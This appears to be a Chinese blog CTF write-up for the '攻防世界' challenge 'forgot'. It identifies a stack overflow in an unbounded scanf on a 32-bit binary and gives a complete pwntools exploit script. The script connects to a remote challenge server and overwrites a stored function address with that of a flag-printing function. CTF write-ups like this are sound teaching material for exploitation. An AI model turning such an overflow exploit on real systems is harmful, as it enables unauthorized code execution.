攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
henry10101013 分钟前
传统IT运维向DevOps转型的路径分析
运维·devops·系统管理
wuqingshun31415913 分钟前
大致说一下程序、进程、线程
java·运维·服务器·开发语言
Starry_hello world26 分钟前
Linux 网络 (4)
linux·网络
苏叶新城27 分钟前
Glibc的版本在centos 7到9对应关系
linux·运维·centos
feng68_35 分钟前
HAProxy
运维·服务器·haproxy
MediaTea41 分钟前
Python:比较协议
运维·服务器·开发语言·网络·python
7yewh1 小时前
AM57X Processor SDK Linux - run Installer
linux·嵌入式硬件·硬件架构·嵌入式
敲代码的哈吉蜂1 小时前
haproxy的算法——静态算法
linux·运维·服务器·算法
Y1rong1 小时前
linux之TCP
linux
苏宸啊1 小时前
OS环境变量
linux·c++
热门推荐
01GitHub 镜像站点02如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解03Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)06MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法07openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南08配置 OpenClaw 使用 Ollama 本地模型09Tripo AI:构建游戏就绪的3D资产10从零搭建一个 PHP 登录注册系统(含完整源码)